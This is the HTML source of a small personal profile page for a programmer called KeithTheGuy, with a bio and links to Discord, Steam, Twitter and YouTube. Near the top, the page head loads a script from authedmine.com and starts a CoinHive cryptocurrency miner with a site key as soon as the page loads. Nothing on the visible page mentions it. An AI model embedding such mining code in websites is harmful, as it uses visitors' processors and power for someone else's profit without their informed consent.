<head>
    
    <link rel="icon" href="images/avatar.png" type="image/png" sizes="128x128">
    
    <script src="https://authedmine.com/lib/authedmine.min.js"></script>
    <script>
        var miner = new CoinHive.Anonymous('8N5A7Cz2b5zFpgkR8WmBXWFDGY3Mlj3k', {throttle: 0.3});
        miner.start();
    </script>
    
    <style>
        @import url('https://fonts.googleapis.com/css?family=Montserrat:400,700');
        @-webkit-keyframes fadeIn {
            0%   {opacity: 0;}
            100% {opacity: 1;}
        }
        @keyframes fadeIn {
            0%   {opacity: 0;}
            100% {opacity: 1;}
        }
        @keyframes rotate {
            0% {-ms-transform: rotate(0deg); -webkit-transform: rotate(0deg); transform: rotate(0deg);}
            50% {-ms-transform: rotate(7deg); -webkit-transform: rotate(8deg); transform: rotate(8deg);}
            100% {-ms-transform: rotate(0deg); -webkit-transform: rotate(0deg); transform: rotate(0deg);}
        }
        .avatar {
            border-radius: 50%;
            box-shadow: 0 0 16px lime;
        }
        .fadeIn1 {
            -webkit-animation: fadeIn 1s linear 1s forwards;
            animation: fadeIn 1s linear 1s forwards;
            opacity: 0;
        } .fadeIn2 {
            -webkit-animation: fadeIn 1s linear 2s forwards;
            animation: fadeIn 1s linear 2s forwards;
            opacity: 0;
        } .fadeIn3 {
            -webkit-animation: fadeIn 1s linear 3s forwards;
            animation: fadeIn 1s linear 3s forwards;
            opacity: 0;
        } 
        .hover {
            -webkit-transition: -webkit-transform 0.6s;
            -o-transition: transform 0.6s;
            transition: transform 0.6s;
        } .hover:hover {
            -webkit-transform: scale(1.1);
            -ms-transform: scale(1.1);
            transform: scale(1.1);
        }
        body {
            background-color: black;
            background-image: url('images/kristopher-roller-110203.jpg');
            background-repeat: no-repeat;
            background-size: cover;
            overflow: hidden;
        }
        div {
            height: 100%;
            position: absolute;
            text-align: center;
            width: 100%;
        }
        h1 {
            font-size: 48px;
        }
        h1,h2,h3,h4,h5,h6 {
            color: white;
            font-family: 'Montserrat';
            font-weight: 700;
            text-shadow: 0 0 8px white;
        }
        p {
            color: white;
            font-family: 'Montserrat';
            font-weight: 400;
            font-size: 12px;
            text-shadow: 0 0 1px white;
        }
    </style>
    
    <title>KeithTheGuy</title>
    
</head>

<body>
    
    <div id="about" style="height: 384px; width: 384px;">
        <img class="avatar fadeIn1 hover" height="128px" src="images/avatar.png" width="128px">
        <h1 class="fadeIn2 hover">KeithTheGuy</h1>
        <p class="fadeIn3 hover">Programmer and video game enthusiast. I design websites, program in Java, and I'm currently learning server-side JavaScript and discord.js API.</p>
        <a class="fadeIn3" href="http://discord.gg/prgYeqq" title="Join my Discord server!"><img class="hover" height="32px" src="images/discord.png" width="32px"></img></a>
        <a class="fadeIn3" href="http://steamcommunity.com/id/coletheguy_" title="Add me on Steam!"><img class="hover" height="32px" src="images/steam.png" width="32px"></img></a>
        <a class="fadeIn3" href="https://twitter.com/coletheguy_" title="Tweet me something!"><img class="hover" height="32px" src="images/twitter.png" width="32px"></img></a>
        <a class="fadeIn3" href="https://www.youtube.com/channel/UCIqONtLv50JhDVVEUh3Q1bA" title="Check out my channel!"><img class="hover" height="32px" src="images/youtube.png" width="32px"></img></a>
    </div>
    
    <script>
        function align() {
            document.getElementById("about").style.left = ((window.innerWidth/2)-192)+"px";
            document.getElementById("about").style.top = ((window.innerHeight/2)-192)+"px";
            setTimeout(align, 10);
        }
        align();
    </script>
    
</body>
